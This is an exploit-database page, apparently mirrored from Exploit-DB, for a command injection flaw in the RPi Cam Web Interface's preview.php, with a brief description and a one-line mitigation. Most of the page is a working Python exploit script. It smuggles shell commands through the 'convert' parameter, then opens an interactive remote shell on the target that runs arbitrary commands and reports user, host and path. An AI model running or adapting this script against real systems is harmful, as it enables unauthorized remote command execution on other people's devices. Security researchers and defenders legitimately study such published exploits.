header-logo
Suggest Exploit
vendor:
N/A
by:
Anonymous
8.8
CVSS
HIGH
Command Injection
78
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2020

RPi Cam Web Interface Exploit

This exploit allows an attacker to execute arbitrary commands on a vulnerable system. The vulnerability exists in the preview.php script, which is used to generate a live preview of the camera. The script takes user input from the 'convert' and 'convertCmd' parameters and passes it to the system without proper sanitization, allowing an attacker to inject arbitrary commands.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized before being passed to the system.
Source

Exploit-DB raw data:

#!/usr/bin/python

import sys
import requests
import os
import re
import readline

def usage():

	print "\nRPi Cam Web Interface Exploit\n"
	print "Usage: %s http://host/path/to/preview.php \n" % sys.argv[0]
	print "Options: "
	print "  -h, --help              Show this help message and exit"
	print ""
	sys.exit(0)

def execute_command(url, cmd):
	
	split = "---a97a13f9f48c65c72e4802fc1e516e3f---"
	convert = ".) >/dev/null 2>&1; (" + cmd + ") 2>&1; echo " + split + ";#aaaaaaa"
	convertCmd = "/usr/bin/ffmpeg -f image2 -i i_%05d.jpg"
	data = {"convert":convert,"convertCmd":convertCmd}
	headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"}

	try:
		r = requests.post(url, headers=headers, data=data, verify=False)
		if r.status_code == 200:
			if len(r.content) > 0 and split in r.content:
				return r.content.split(split)[0]
			else:
				return ""
		else:
			print "\n[*] Error: Received HTTP Status " + str(r.status_code) + "\n"
			return ""	
	except requests.ConnectionError as e:
		print "\n[*] Error: An error occurred while connecting to the host.\n"
		exit(1)
	except requests.exceptions.RequestException as e:
		print "\n[*] Error: Something unexpected happened.\n"
		print e
		exit(1)

def main():

	if len(sys.argv) < 2 or sys.argv[1] in ("-h", "--help"):
		usage()

	url = sys.argv[1]

	print "\nRPi Cam Web Interface Exploit"

	print "\n[*] Attempting exploit on:"
	print "    " + url

	username = execute_command(url,"whoami").strip()
	if len(username) == 0:
		exit(1)
        
	hostname = execute_command(url, "hostname").strip()

	path = execute_command(url, "pwd").strip()

	print "\n[*] Returning prompt!\n"

	try:
		while True:
			prompt = username + "@" + hostname + ":" + path + "$ " 
			cmd = raw_input(prompt)
			if cmd == "exit":
				print "\n[*] Goodbye!\n"
				return
                        elif cmd.startswith("cd "):
                                chars = set(";&|")
				if any((c in chars) for c in cmd):
					print "[*] This shell only supports cd as a standalone command."
				else:
					cmd = cmd.split()
					tmpPath = " ".join(cmd[1:])
					if tmpPath == "..":
						if len(path.split("/")) > 2:
							tmpPath = "/".join(path.split("/")[:-1])
						else:
							tmpPath = "/"
					cmd = "cd " + path + " && cd " + tmpPath + " 2>&1 && pwd"
					tmpPath = execute_command(url,cmd).strip()
					if tmpPath.startswith("/") or re.match("^[a-zA-Z]:\\)*",tmpPath):
						path = tmpPath
					else:
						print tmpPath.split('\n')[0]
			elif cmd == "clear":
				os.system("clear")
			else:
				cmd = "cd " + path + " && " + cmd
				results = execute_command(url, cmd)
				if len(results) != 0:
					print results

	except KeyboardInterrupt:
		print "\n\n[*] Goodbye!\n"
		return

if __name__ == "__main__":
	main()

Navigation

Suggest Exploit

Services By CQR